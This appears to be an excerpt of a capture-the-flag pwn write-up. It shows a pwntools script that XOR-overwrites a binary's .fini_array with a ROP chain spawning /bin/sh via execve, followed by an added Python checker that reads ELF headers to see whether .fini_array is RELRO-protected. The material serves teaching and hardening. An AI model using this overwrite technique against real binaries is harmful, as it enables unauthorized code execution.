Tags: fini_array pwn rop 

fini_array attack with ROP

from pwn import *   # u64() comes from pwntools; the rest of the template lives in the full writeup

# leave, prdi, prsi, prdx, prax and syscall are gadget addresses, and modify()/sla()
# are the challenge-interaction helpers; all are defined in the full writeup and are
# not reproduced in this excerpt.

fini_array = 0x6d2150
# Original 8-byte words currently stored at fini_array + 8*i; the comment on each
# entry names the ropchain slot that will replace it.
raw = [0x0000000000400b00,   # 0 -> leave
       0x0000000000400590,   # 1 -- nop
       0x0000000d00000002,   # 2 -> prdi
       0x00000000004ada80,   # 3 -> 0x6d21a8 -> /bin/sh
       0x00000000004ada60,   # 4 -> prsi
       0x0000000000000000,   # 5 -- 0
       0x00000000006d44c0,   # 6 -> prdx
       0x0000000000000001,   # 7 -> 0
       0x00000000006d4440,   # 8 -> prax
       0x0000000000000001,   # 9 -> 0x3b
       0x00000000004b2680,   # 10-> syscall
       0x00000000004b25a0]   # 11-> /bin/sh

ropchain = [leave,
            0x0000000000400590,
            prdi,
            0x6d21a8,            # == fini_array + 8*11, where the '/bin/sh\0' string lands
            prsi,
            0,
            prdx,
            0,
            prax,
            0x3b,                # SYS_execve on x86-64
            syscall,
            u64(b'/bin/sh\0')]   # bytes, so this also works with Python 3 pwntools

modify(0x6D7330,0x80000000)
for i in range(len(ropchain)):
    # modify() receives raw[i] ^ ropchain[i], the XOR of the current word and the
    # wanted word, so the primitive evidently XORs into memory rather than overwriting it.
    modify(fini_array+8*i,raw[i]^ropchain[i])
# debug('b *0x400590')
sla('\x1B[1maddr:\x1B[m ','0x6D7330:9')
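
The precondition for the technique above is that `.fini_array` is still writable when the attacker gets their write primitive. The following checker is an added example, not code from the writeup or the challenge: it parses the ELF64 program and section headers directly (no pyelftools), locates the `SHT_FINI_ARRAY` section and reports whether it lies in a read-only `PT_LOAD`, is covered by a `PT_GNU_RELRO` segment (the `-z relro` mitigation, which the startup code is expected to mprotect read-only before `main()` runs), or is plainly writable. `build_sample_elf()` constructs two tiny header-only images so the checker runs offline; the addresses in it are assumptions that merely mirror the writeup's `fini_array = 0x6d2150`, and `fini_array_protection` is my own function name.

```python
import struct
import sys

# ELF constants (from the ELF specification)
PT_LOAD = 1
PT_GNU_RELRO = 0x6474E552
PF_W = 0x2
SHT_FINI_ARRAY = 15
SHF_WRITE = 0x1
SHF_ALLOC = 0x2


def parse_elf64(data):
    """Return (program headers, section headers) of a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    e_phoff, e_shoff = struct.unpack_from("<QQ", data, 0x20)
    e_phentsize, e_phnum, e_shentsize, e_shnum, _ = struct.unpack_from("<HHHHH", data, 0x36)
    phdrs = []
    for i in range(e_phnum):
        p_type, p_flags, _, p_vaddr, _, _, p_memsz, _ = struct.unpack_from(
            "<IIQQQQQQ", data, e_phoff + i * e_phentsize)
        phdrs.append({"type": p_type, "flags": p_flags, "vaddr": p_vaddr, "memsz": p_memsz})
    shdrs = []
    for i in range(e_shnum):
        _, sh_type, sh_flags, sh_addr, _, sh_size, _, _, _, _ = struct.unpack_from(
            "<IIQQQQIIQQ", data, e_shoff + i * e_shentsize)
        shdrs.append({"type": sh_type, "flags": sh_flags, "addr": sh_addr, "size": sh_size})
    return phdrs, shdrs


def _covers(seg, addr, size):
    """True if [addr, addr+size) lies entirely inside the segment's memory range."""
    return seg["vaddr"] <= addr and addr + size <= seg["vaddr"] + seg["memsz"]


def fini_array_protection(data):
    """Classify .fini_array as 'absent', 'read-only', 'relro' or 'writable'.

    'relro' means a PT_GNU_RELRO segment covers the array, so the loader (or libc's
    startup code in a static binary) is expected to mprotect it read-only; the
    checker reports what the headers promise, not what the runtime actually did.
    'writable' means nothing in the headers prevents the overwrite shown above.
    """
    phdrs, shdrs = parse_elf64(data)
    arrays = [s for s in shdrs if s["type"] == SHT_FINI_ARRAY and s["flags"] & SHF_ALLOC]
    if not arrays:
        return "absent"
    sec = arrays[0]
    loads = [p for p in phdrs if p["type"] == PT_LOAD and _covers(p, sec["addr"], sec["size"])]
    if loads and not any(p["flags"] & PF_W for p in loads):
        return "read-only"
    if any(p["type"] == PT_GNU_RELRO and _covers(p, sec["addr"], sec["size"]) for p in phdrs):
        return "relro"
    return "writable"


def build_sample_elf(relro):
    """Construct a minimal, header-only (not runnable) ELF64 image whose .fini_array
    sits in a RW PT_LOAD segment; with relro=True a PT_GNU_RELRO segment covers it,
    as `ld -z relro` would emit. All addresses are constructed sample values."""
    fini_addr, fini_size = 0x6D2150, 12 * 8          # assumption mirroring the writeup
    shstrtab = b"\0.fini_array\0.shstrtab\0"
    phdrs = [(PT_LOAD, 6, 0, 0x6D0000, 0x6D0000, 0x10000, 0x10000, 0x1000)]   # PF_R|PF_W
    if relro:
        phdrs.append((PT_GNU_RELRO, 4, 0, 0x6D0000, 0x6D0000, 0x3000, 0x3000, 1))
    e_phoff = 64
    shstr_off = e_phoff + 56 * len(phdrs)
    e_shoff = shstr_off + len(shstrtab)
    shdrs = [
        (0, 0, 0, 0, 0, 0, 0, 0, 0, 0),                                       # null section
        (1, SHT_FINI_ARRAY, SHF_WRITE | SHF_ALLOC, fini_addr, 0, fini_size, 0, 0, 8, 8),
        (13, 3, 0, 0, shstr_off, len(shstrtab), 0, 0, 1, 0),                  # SHT_STRTAB
    ]
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8   # ELFCLASS64, little-endian
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0, e_phoff, e_shoff, 0,
                               64, 56, len(phdrs), 64, len(shdrs), 2)
    body = b"".join(struct.pack("<IIQQQQQQ", *p) for p in phdrs) + shstrtab
    body += b"".join(struct.pack("<IIQQQQIIQQ", *s) for s in shdrs)
    return ehdr + body


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(sys.argv[1], fini_array_protection(f.read()))
    else:
        for relro in (False, True):
            print("sample relro=%s -> %s" % (relro, fini_array_protection(build_sample_elf(relro))))
```

Run it with a binary path to audit a real file, or with no arguments to see the two constructed samples classified as `writable` and `relro`. The classification is per section header only; a stripped binary without section headers needs the `DT_FINI_ARRAY`/`DT_FINI_ARRAYSZ` dynamic tags instead, which this example does not read.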

Original writeup (http://taqini.space/2020/05/08/Midnightsun-CTF-2020-pwn6-wp/#modify-fini-array).